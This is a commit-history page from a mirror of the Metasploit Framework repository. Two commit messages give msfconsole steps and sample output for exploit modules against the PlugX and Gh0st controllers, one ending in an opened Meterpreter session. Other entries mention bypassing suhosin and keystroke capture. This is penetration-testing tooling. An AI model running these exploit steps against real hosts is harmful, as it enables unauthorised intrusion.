infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
43,127 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

43127 Commits (99546330f1c3ec4e222017027c6d70f61907226a)

Author SHA1 Message Date
Professor-plum 99546330f1 Added PlugX Controller Stack Overflow Module 
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.

- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target

Sample output:
```
msf> use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check

[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
 2017-07-29 10:36:42 -06:00
Professor-plum c336daec8d Added Gh0st Controller Buffer Overflow Module 
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution 

## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.

- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit

Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 192.168.161.1:4444 
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
 2017-07-29 10:21:05 -06:00
wchen-r7 c5021bf665 Land #8761, Add CVE-2017-7442: Nitro Pro PDF Reader JS API Code X 2017-07-28 17:02:59 -05:00
Metasploit 70f659370f
Bump version of framework to 4.15.5 2017-07-28 10:21:44 -07:00
Brent Cook cdda4bd918
Land #8784, update payloads 2017-07-28 09:59:11 -07:00
Brent Cook ddc4fd95a5 Update payloads 
This incorporates support for HiDPI displays with screen capture for Windows
meterpreter, and fixes a communications bug with Android meterpreter.
 2017-07-28 09:56:03 -07:00
William Vu c9853a6bfe
Land #8735, robots.txt for HttpServer 2017-07-24 18:26:41 -05:00
William Vu a950ecc345 Clean up style 2017-07-24 18:26:05 -05:00
William Vu 2d9e14b208
Land #8763, exploit/multi/handler improvements 
ExitOnSession=false && Passive
 2017-07-24 17:55:16 -05:00
Brent Cook 354869205a make exploit/multi/handler passive 
This gives exploit/multi/handler a makeover, updating to use more-or-less
standard Ruby, and removing any mystical hacks at the same time (like select
instead of sleep).

This also gives it a Passive stance, and sets ExitOnSession to be false by
default, which is the setting that people use 99% of the time anyway.
 2017-07-24 15:47:06 -07:00
William Vu d5d1b4b974
Land #8612, RSS feed plugin 
<3 @mubix
 2017-07-24 17:27:00 -05:00
William Vu f77554f3dc Clean up plugin 
Just whitespace. ;)
 2017-07-24 17:26:39 -05:00
mr_me bf4dce19fb I added the SSD advisory 2017-07-24 14:25:10 -07:00
Rob Fuller b66119b0d5 fix egypt red pen 2017-07-24 13:47:37 -07:00
Rob Fuller 67cc95afa3 remove Id - Revision lines 2017-07-24 12:48:51 -07:00
mr_me b099196172 deregistered SSL, added the HTA dodgy try/catch feature 2017-07-24 10:28:03 -07:00
mr_me 17b28388e9 Added the advisory, opps 2017-07-24 10:09:21 -07:00
mr_me 14ca2ed325 Added a icon loading trick by Brendan 2017-07-24 10:06:20 -07:00
mr_me b2a002adc0 Brendan is an evil genius\! 2017-07-24 09:58:23 -07:00
mr_me cc8dc002e9 Added CVE-2017-7442 2017-07-24 08:21:59 -07:00
Brent Cook cdfb6782a8
Land #8639, Add mic audio streaming to Linux/OSX native meterpreter 2017-07-24 07:01:00 -07:00
Brent Cook 12198a0881
Land #8716, print_* normalization, url and splat updates, rubocop fixes 2017-07-24 06:36:09 -07:00
Brent Cook 6300758c46 use https for metaploit.com links 2017-07-24 06:26:21 -07:00
Brent Cook 80d18fae6a update example modules to have zero violations 2017-07-24 06:15:54 -07:00
Brent Cook 6e06d1a8b1 update rubocop rules for common practice 2017-07-24 06:15:35 -07:00
Brent Cook 1d290d2491 resurrect one print_error/bad conversion for symmetry 2017-07-24 05:55:34 -07:00
Brent Cook 8db3f74b81 fix a broken link 2017-07-24 05:53:09 -07:00
Brent Cook 838b066abe Merge branch 'master' into land-8716 2017-07-24 05:51:44 -07:00
Brent Cook a0511c79a4
pull in minor build fixes and filesystem stat implementation from python 
This pulls in https://github.com/rapid7/metasploit-payloads/pull/219
and https://github.com/rapid7/metasploit-payloads/pull/195
 2017-07-23 22:37:43 -07:00
Brent Cook 92d1b3f634
Land #8757, Properly handle threads and window destruction, add PID logging 2017-07-23 22:33:06 -07:00
Brent Cook 3bc0c18e6a Properly handle threads and window destruction, add PID logging 
This pulls in https://github.com/rapid7/metasploit-payloads/pull/213
which fixes https://github.com/rapid7/metasploit-framework/issues/8608
and adds PID logging to verbose keyboard capture.
 2017-07-23 22:27:42 -07:00
Brent Cook 776523b9cc
Land #8756, Add eval alternative to PHP Meterpreter to bypass suhosin 2017-07-23 22:15:32 -07:00
Brent Cook 8444038c62
Add eval alternative to PHP Meterpreter to bypass suhosin 
See https://suhosin.org/stories/index.html for more information on this system.
 2017-07-23 22:04:09 -07:00
Brent Cook 800cdcc866
Land #8737, better handle sudden disconnects with SMTP servers 2017-07-23 15:04:50 -07:00
Brent Cook 6849e510cd
Land #8755, skip rb-readline pin on Windows 2017-07-23 13:14:45 -07:00
Brent Cook 85e9be0705 only pin rb-readline on linux/osx 2017-07-23 12:13:15 -07:00
Pearce Barry fb905c4bc7
Land #8754, fix some module documentation 2017-07-23 11:44:07 -05:00
Pearce Barry a140209c36
Land #8739, cleanup windows_autologin 2017-07-23 11:35:34 -05:00
Brent Cook 7c55cdc1c8 fix some module documentation 
3 modules got documentation landed in the wrong spot. This also fixes a few
typos and improves formatting.
 2017-07-23 07:46:52 -07:00
Brent Cook df22e098ed
Land #8695, Fix #8675, Add Cache-Control header, also meta tag for BAP2 2017-07-23 07:17:45 -07:00
Brent Cook 8c8dbc6d38
Land #8692, Fix #8685, Check nil condition for #wordlist_file in jtr modules 2017-07-23 07:12:21 -07:00
Brent Cook 2c3712479d
Land #8750, openssl_heartbleed fix, use ruby 2.4 OpenSSL::PKey::RSA API 2017-07-23 06:58:40 -07:00
Brent Cook 6e1274048e
Land #8753, Fix an issue where 'sleep' with Python Meterpreter appears to fail 2017-07-23 05:46:01 -07:00
Brent Cook b75530b978 Fix an issue where 'sleep' with Python Meterpreter appears to fail. 2017-07-23 05:38:06 -07:00
Brent Cook 399557124f
update payload cached sizes 2017-07-23 05:28:32 -07:00
Brent Cook 302b66c2d8
add payloads support for OSX with python meterpreter 2017-07-23 05:26:59 -07:00
Brent Cook ee992daeff
Land #8752, Hide errors in Windows Meterpreter sessions 2017-07-23 05:20:41 -07:00
Brent Cook 072b0dc90b Hide errors in Windows Meterpreter sessions 
In Windows Meterpreter sessions, set newly created threads via
SetThreadErrorMode to not display error popups when there are failures.
 2017-07-23 05:09:01 -07:00
Christian Mehlmauer b4bb384577
add @pbarry-r7 's feedback 2017-07-22 18:54:36 +02:00
g0tmi1k e710701416 Made msftidy.rb happy 
...untested with the set-cookie 'fix'
 2017-07-21 19:55:26 -07:00